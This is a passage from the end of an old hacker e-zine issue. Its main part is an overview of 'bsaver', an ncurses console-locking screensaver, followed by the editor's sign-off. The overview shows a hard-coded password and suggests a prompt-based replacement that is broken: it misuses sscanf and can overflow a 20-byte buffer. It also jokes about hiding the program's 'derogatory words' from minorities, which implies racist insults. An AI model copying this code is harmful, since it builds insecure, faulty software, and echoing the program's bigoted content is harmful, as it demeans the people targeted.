he was picketing somewhere near the Plaza. HEH it was a sight to behold.
He's wrong. I am right. HAHA
-x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x-
<b4b0!b4b0!b4b0!b4b0> bsaver overview, by cp4kt <b4b0!b4b0!b4b0!b4b0>
-x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x-
This little program, based off of Qytpos drugz2.c, has been turned into a
lovely ncurses screen saver. Nice words, derogatory words, and most
importantly; dill monkey words come up -- It's fun for the whole family.
We / I decided to just store the password in this line here.
static char passwd[] = "dillmonkey" ;
If you can code just a teeny bit, you can change this to a macro. Did I
mention teeny? We also thought that perhaps you might want to accept a
password via something prompting for a password at each session. Such
might be accomplished by:
static char passwd[20];
...
printf("Enter password to use: ");
sscanf("%20s", passwd);
But the problem is if you forget, you might as well reboot. Also, you can
have it saved in perhaps a file .bsaver and open, fgets() from it, but
remember the character length has to be 20! You can also merely use the
passwd structure and use your login password via crypt() etc. Anyways, the
code is yours to edit. If there is any problems, mail me at
comp4ct@hotmail.com
p.s. don't abuse getch. Hit Enter *ONE TIME* to get a password prompt.
NOTE: If you have any minorities in your office / household, i would not
run this program in front of them. It make lock your console, but if they
see whats popping up, you could be fired / flogged. But isn't that the
b4b0 way?
Good Day,
cp4kt
Special thanks to: Matt Conover (Shok of w00w00) for his great article on
console ioctls. The macros used to lock console were taken from there.
Thank you.
-/- -/- -/- -/- -/- -/- -/- -/- -/- -/- -/- -/- -/- -/- -/- -/- -/- -/-
Closing up..
WELP, THATS IT. Hope you enjoyed this totally k-sp1ff, extraoridinary
diverse issue of BABO! Please send many submissions to us for B4B0 8
(submissions@b4b0.org). Comments and questions go to: letters@b4b0.org
Your editor, ph1x.
######## ######## ########
## ## ## ##
######## ## ## ########
## ## ## ##
######## ######## ##
Reference in a new issue View git blame Copy permalink